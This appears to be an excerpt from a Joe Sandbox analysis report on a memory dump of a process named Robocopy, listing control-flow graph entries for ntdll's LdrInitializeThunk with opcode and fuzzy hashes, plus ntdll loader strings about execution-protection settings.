                                          • Instruction ID: bfcd5503f73a43fd52bc9abab31c37183745889230756d38688a8654d3695a84
                                          • Opcode Fuzzy Hash: ab178b0aee38f2db8c7c44d4e8059a1718a6ec9e4b5b588cb736d623f40070cd
                                          • Instruction Fuzzy Hash: 1990023120100413F51171584614787004D97D0285F91DC16B0C15558DD666D956B161

                                          Control-flow Graph
                                          control_flow_graph 150 45a2e50-45a2e5c LdrInitializeThunk
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.272502876792.0000000004530000.00000040.00001000.00020000.00000000.sdmp, Offset: 04530000, based on PE: true
                                          • Associated: 00000006.00000002.272502876792.0000000004659000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000006.00000002.272502876792.000000000465D000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_4530000_Robocopy.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 3b51d0afbca9827943fd2a43c668f5eabea57537bca527d75436cd8b2fef47ec
                                          • Instruction ID: 4b670707f500462e9b44174189f425dd4b7b38c29020e4bd459c8c7d04584bae
                                          • Opcode Fuzzy Hash: 3b51d0afbca9827943fd2a43c668f5eabea57537bca527d75436cd8b2fef47ec
                                          • Instruction Fuzzy Hash: 2190026134100443F50071584524B860049D7E1345F51D819F1855554DC629DC567166

                                          Control-flow Graph
                                          control_flow_graph 151 45a2f00-45a2f0c LdrInitializeThunk
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.272502876792.0000000004530000.00000040.00001000.00020000.00000000.sdmp, Offset: 04530000, based on PE: true
                                          • Associated: 00000006.00000002.272502876792.0000000004659000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000006.00000002.272502876792.000000000465D000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_4530000_Robocopy.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 49c2d0e779d563bb23352daa92360bd16e763106fa607a610a4ddb80242f9c28
                                          • Instruction ID: e153d33eb65566778396f112fe0df33d19057baa2a2c50bd0ee31d3e3b1071af
                                          • Opcode Fuzzy Hash: 49c2d0e779d563bb23352daa92360bd16e763106fa607a610a4ddb80242f9c28
                                          • Instruction Fuzzy Hash: 6490022121180043F60075684D24B87004997D0347F51D919B0945554CC925D8657561

                                          Control-flow Graph
                                          control_flow_graph 140 45a29f0-45a29fc LdrInitializeThunk
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.272502876792.0000000004530000.00000040.00001000.00020000.00000000.sdmp, Offset: 04530000, based on PE: true
                                          • Associated: 00000006.00000002.272502876792.0000000004659000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000006.00000002.272502876792.000000000465D000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_4530000_Robocopy.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 598a337bf6292329d3e42738856c2c13f72dbc003d5fcf17c0eac20eac1e83f7
                                          • Instruction ID: dacc72654cd29462f6d95c3a361c8d5ea551845a4d8dcd305cbab0dcc0547b3c
                                          • Opcode Fuzzy Hash: 598a337bf6292329d3e42738856c2c13f72dbc003d5fcf17c0eac20eac1e83f7
                                          • Instruction Fuzzy Hash: 52900225211000032505B5580714587008A97D5395351D825F1806550CD631D8657161

                                          Control-flow Graph
                                          control_flow_graph 141 45a2a80-45a2a8c LdrInitializeThunk
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.272502876792.0000000004530000.00000040.00001000.00020000.00000000.sdmp, Offset: 04530000, based on PE: true
                                          • Associated: 00000006.00000002.272502876792.0000000004659000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000006.00000002.272502876792.000000000465D000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_4530000_Robocopy.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: ec3fdabb70565c354111a57b315f37d383fa0bded8c1e7d88a88a89a52e2a7ed
                                          • Instruction ID: 530fb4ddaee1b9dff1bbb31fbae1cea62c7f043444f924bb267dfe30427e795c
                                          • Opcode Fuzzy Hash: ec3fdabb70565c354111a57b315f37d383fa0bded8c1e7d88a88a89a52e2a7ed
                                          • Instruction Fuzzy Hash: C290026120200003650571584524696404E97E0245B51D825F1805590DC535D8957165

                                          Control-flow Graph
                                          control_flow_graph 143 45a2b10-45a2b1c LdrInitializeThunk
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.272502876792.0000000004530000.00000040.00001000.00020000.00000000.sdmp, Offset: 04530000, based on PE: true
                                          • Associated: 00000006.00000002.272502876792.0000000004659000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000006.00000002.272502876792.000000000465D000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_4530000_Robocopy.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 2ca25a81eb6a57207ad924c0084152c1a18e94194a66207b171b6136398f5565
                                          • Instruction ID: 5e621215876d71936f3aa3114b377d82d787e74294a2cf2eaefc5fa41eb37e64
                                          • Opcode Fuzzy Hash: 2ca25a81eb6a57207ad924c0084152c1a18e94194a66207b171b6136398f5565
                                          • Instruction Fuzzy Hash: BE90023120100803F580715845146CA004997D1345F91D819B0816654DCA25DA5D77E1

                                          Control-flow Graph
                                          control_flow_graph 142 45a2b00-45a2b0c LdrInitializeThunk
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.272502876792.0000000004530000.00000040.00001000.00020000.00000000.sdmp, Offset: 04530000, based on PE: true
                                          • Associated: 00000006.00000002.272502876792.0000000004659000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000006.00000002.272502876792.000000000465D000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_4530000_Robocopy.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 66cd39db98988a4cac1d215a8ce04188dacf0eebece65324a272d29f3a1fc4d8
                                          • Instruction ID: 770a375805cfd72b4924eddb210454ee9d364d01d7eb066c903f0a59b050f701
                                          • Opcode Fuzzy Hash: 66cd39db98988a4cac1d215a8ce04188dacf0eebece65324a272d29f3a1fc4d8
                                          • Instruction Fuzzy Hash: D590023120504843F54071584514AC6005997D0349F51D815B0855694DD635DD59B6A1

                                          Control-flow Graph
                                          control_flow_graph 146 45a2bc0-45a2bcc LdrInitializeThunk
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.272502876792.0000000004530000.00000040.00001000.00020000.00000000.sdmp, Offset: 04530000, based on PE: true
                                          • Associated: 00000006.00000002.272502876792.0000000004659000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000006.00000002.272502876792.000000000465D000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_4530000_Robocopy.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: eed337c32fb6f41eb36a5da2f2e381083d8929f4ae86bb7ae1fd5596f36d31d7
                                          • Instruction ID: 68c3c356fc61c607056862e35d2314b3d9e460da3f4c73fbeb22f7181c6ec82d
                                          • Opcode Fuzzy Hash: eed337c32fb6f41eb36a5da2f2e381083d8929f4ae86bb7ae1fd5596f36d31d7
                                          • Instruction Fuzzy Hash: 8490023120100403F500759855186C6004997E0345F51E815B5815555EC675D8957171

                                          Control-flow Graph
                                          control_flow_graph 145 45a2b90-45a2b9c LdrInitializeThunk
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.272502876792.0000000004530000.00000040.00001000.00020000.00000000.sdmp, Offset: 04530000, based on PE: true
                                          • Associated: 00000006.00000002.272502876792.0000000004659000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000006.00000002.272502876792.000000000465D000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_4530000_Robocopy.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: bbdeceb2c3ada53fd36048055bd4af20115a469180ac74bc851a3e6053d30179
                                          • Instruction ID: b815f859ec77fce73f64220a5fab8e5cffb418c35e8c11f3bec475e2f1370ee0
                                          • Opcode Fuzzy Hash: bbdeceb2c3ada53fd36048055bd4af20115a469180ac74bc851a3e6053d30179
                                          • Instruction Fuzzy Hash: 8A90023120108803F510715885147CA004997D0345F55DC15B4C15658DC6A5D8957161

                                          Control-flow Graph
                                          control_flow_graph 144 45a2b80-45a2b8c LdrInitializeThunk
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.272502876792.0000000004530000.00000040.00001000.00020000.00000000.sdmp, Offset: 04530000, based on PE: true
                                          • Associated: 00000006.00000002.272502876792.0000000004659000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000006.00000002.272502876792.000000000465D000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_4530000_Robocopy.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: b49e915629586a9767800bcd6a671ac6d070d1dc387498e3cdb2cc627ccba1d0
                                          • Instruction ID: 42c47da5c946b46d47ea873a2996245623ae9e51e4056ef77c813db44d18c717
                                          • Opcode Fuzzy Hash: b49e915629586a9767800bcd6a671ac6d070d1dc387498e3cdb2cc627ccba1d0
                                          • Instruction Fuzzy Hash: 3E90023120100843F50071584514BC6004997E0345F51D81AB0915654DC625D8557561

                                          Control-flow Graph
                                          control_flow_graph 136 45a2b2a-45a2b2f 137 45a2b3f-45a2b46 LdrInitializeThunk 136->137 138 45a2b31-45a2b38 136->138
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.272502876792.0000000004530000.00000040.00001000.00020000.00000000.sdmp, Offset: 04530000, based on PE: true
                                          • Associated: 00000006.00000002.272502876792.0000000004659000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000006.00000002.272502876792.000000000465D000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_4530000_Robocopy.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 953419de0f2dad1a82371f7566b82c451b2be3ee9cfe0c9aa63a95aecd8fb996
                                          • Instruction ID: d45c7c3588cc97c6bb911966e6ce8d609940f00b0c175817d27c5328f22571bb
                                          • Opcode Fuzzy Hash: 953419de0f2dad1a82371f7566b82c451b2be3ee9cfe0c9aa63a95aecd8fb996
                                          • Instruction Fuzzy Hash: 0DB09B719014C5C7FB11EB60570875B794477D0745F15C455F1860691E4738D095F175
                                          Strings
                                          • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 045D4460
                                          • Execute=1, xrefs: 045D451E
                                          • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 045D454D
                                          • CLIENT(ntdll): Processing section info %ws..., xrefs: 045D4592
                                          • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 045D4507
                                          • ExecuteOptions, xrefs: 045D44AB
                                          • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 045D4530
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.272502876792.0000000004530000.00000040.00001000.00020000.00000000.sdmp, Offset: 04530000, based on PE: true
                                          • Associated: 00000006.00000002.272502876792.0000000004659000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000006.00000002.272502876792.000000000465D000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_4530000_Robocopy.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                          • API String ID: 0-484625025
                                          • Opcode ID: 9438083d0e7b59eb6eaace40b03193c1cedba06cd6afa722d17e30cb20fb4c11
                                          • Instruction ID: 80a23b3cf9eb6e62037542411e01e09d319070cdbb71d314a5d378b846a23b62
                                          • Opcode Fuzzy Hash: 9438083d0e7b59eb6eaace40b03193c1cedba06cd6afa722d17e30cb20fb4c11
                                          • Instruction Fuzzy Hash: C651EC31610219BBEF64AE94EC59FAD73E8FF48304F0405AAD505A7181E770BE45EF54
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.272502876792.0000000004530000.00000040.00001000.00020000.00000000.sdmp, Offset: 04530000, based on PE: true
                                          • Associated: 00000006.00000002.272502876792.0000000004659000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000006.00000002.272502876792.000000000465D000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_4530000_Robocopy.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: $$@
                                          • API String ID: 0-1194432280
                                          • Opcode ID: 5b64a7f929511115d7d5296679c0fa5e2b7b50ff621036699738e708a52fb5de
                                          • Instruction ID: 5cd7b662b0f197889e4a1602e4b5d0e9c9d368a7791b2f26ecc1f819bcb98259
                                          • Opcode Fuzzy Hash: 5b64a7f929511115d7d5296679c0fa5e2b7b50ff621036699738e708a52fb5de
                                          • Instruction Fuzzy Hash: 1A810AB1D002699BDB31DB94CC44BEEB6B8BB44714F0041EAE909B7250E7706E84DFA1